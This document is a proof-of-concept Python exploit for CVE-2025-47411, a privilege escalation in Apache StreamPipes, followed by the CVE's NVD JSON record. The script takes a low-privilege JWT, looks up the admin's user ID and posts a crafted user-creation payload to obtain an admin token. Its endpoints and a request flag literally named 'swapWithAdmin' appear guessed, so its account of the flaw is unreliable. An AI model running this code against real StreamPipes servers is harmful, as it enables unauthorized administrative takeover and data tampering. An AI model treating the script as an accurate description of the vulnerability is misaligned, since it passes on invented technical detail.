CVE-2025-47411

# CVE-2025-47411 PoC - Apache StreamPipes Privilege Escalation import requests import json TARGET_URL = "http://target:8080" ATTACKER_TOKEN = "your_low_privilege_jwt_token" ADMIN_USERNAME = "admin" def exploit_privilege_escalation(): """ Exploit CVE-2025-47411 by swapping user ID with admin """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Get current user info user_info = requests.get(f"{TARGET_URL}/api/v1/users/me", headers=headers).json() attacker_id = user_info.get("userId") # Step 2: Get admin user info admin_info = requests.get(f"{TARGET_URL}/api/v1/users/admin", headers=headers).json() admin_id = admin_info.get("userId") # Step 3: Exploit - Swap user IDs via user creation mechanism exploit_payload = { "userId": admin_id, "username": "attacker", "originalUserId": attacker_id, "swapWithAdmin": True } response = requests.post( f"{TARGET_URL}/api/v1/users/create", headers=headers, json=exploit_payload ) # Step 4: Generate malicious JWT with escalated privileges if response.status_code == 200: malicious_token = response.json().get("token") print(f"[+] Privilege Escalation Successful!") print(f"[+] New JWT Token: {malicious_token}") return malicious_token return None if __name__ == "__main__": exploit_privilege_escalation()

{"cve": {"id": "CVE-2025-47411", "sourceIdentifier": "[email protected]", "published": "2026-01-01T17:15:42.943", "lastModified": "2026-01-06T14:40:33.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A user with a legitimate non-administrator account can exploit a vulnerability in the user ID creation mechanism in Apache StreamPipes that allows them to swap the username of an existing user with that of an administrator. \n\nThis vulnerability allows an attacker to gain administrative control over the application by manipulating JWT tokens, which can lead to data tampering, unauthorized access and other security issues.\n\n\n\n\n\n\nThis issue affects Apache StreamPipes: through 0.97.0.\n\nUsers are recommended to upgrade to version 0.98.0, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.69.0", "versionEndExcluding": "0.98.0", "matchCriteriaId": "4FEF6DA0-6120-4ACC-A72B-16ED5CF15E1B"}]}]}], "references": [{"url": "https://lists.apache.org/thread/lngko4ht2ok3o0rk9h0clgm4kb0lmt36", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/29/14", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}